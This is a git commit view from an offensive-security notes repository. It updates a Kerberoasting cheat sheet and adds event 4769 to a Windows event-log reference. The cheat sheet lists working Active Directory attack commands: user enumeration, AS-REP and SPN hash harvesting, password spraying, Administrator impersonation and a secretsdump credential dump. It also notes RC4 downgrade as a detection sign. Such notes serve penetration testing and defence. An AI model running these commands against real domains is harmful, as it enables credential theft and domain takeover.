whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

added kerberoastable information

This commit is contained in:
gurkenhabicht 2026-04-03 21:17:36 +02:00
parent 6bd59faa8f
commit ccaa96dab5
2 changed files with 28 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
Enumeration/Kerberoast.md
View File

@ -1,5 +1,10 @@
# Kerberoast
An indicator for kerberoast are downgraded RC4 encryption instead of AES.
That means `Ticket_Encryption_Type=0x17` (RC4) instead of `0x12` (AES-256).
The event code for TGS, which is needed for kerberoasting is `4769`.
## Usage
### List users
@ -10,17 +15,21 @@ kerbrute userenmum --dc $TARGET_IP --domain $DOMAIN $USER_LIST --downgrade
```
### Get Users
* Impacket's `GetNPUsers.py` to get Hashes of userlist
```sh
GetNPUsers.py -no-pass <DomainName>/ -usersfile users.txt -format john -outputfile hashes
```
### Find SPNs
```sh
GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
```
or
```sh
pyverview get-netuser -u <USER> -p <PASSWORD> -t <SUBDOMAIN> -d <DOMAIN>
```
@ -32,12 +41,17 @@ findDelegation.py -debug <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
```
### Check Found Users
* Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py`
Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py`
```sh
crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
```
* Watch out for `STATUS_PASSWORD_MUST_CHANGE`
* Change password with
Watch out for `STATUS_PASSWORD_MUST_CHANGE`
Change password with
```sh
smbpasswd.py <user>@$TARGET_IP -newpass password123
```
@ -47,10 +61,12 @@ smbpasswd.py <user>@$TARGET_IP -newpass password123
```sh
getST.py -spn <USER>/<SUBDOMAIN> -impersonate Administrator '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip $TARGET_IP
```
* Serviceticket is save as `Administrator.ccache`
* `export KRB5CCNAME=Administrator.ccache`
* After that dump secrets
```sh
secretsdump.py -k -no-pass <DOMAIN>
```
* Serviceticket is safe as `Administrator.ccache`
* `export KRB5CCNAME=Administrator.ccache`
After that dump secrets:
```sh
secretsdump.py -k -no-pass <DOMAIN>
```

1
Forensics/Windows Event Logs.md
View File

@ -65,6 +65,7 @@ The `subject` is the account doing an action on an `object`.
* **4756**: Attempt to add an account to a universal security group
* **4757**: Attempt to remove an account from a universal security group
* **4768**: Kerberos TGT request
* **4769**: Kerberos TGS request
* **4771**: Kerberos pre-auth failure
### Account Logon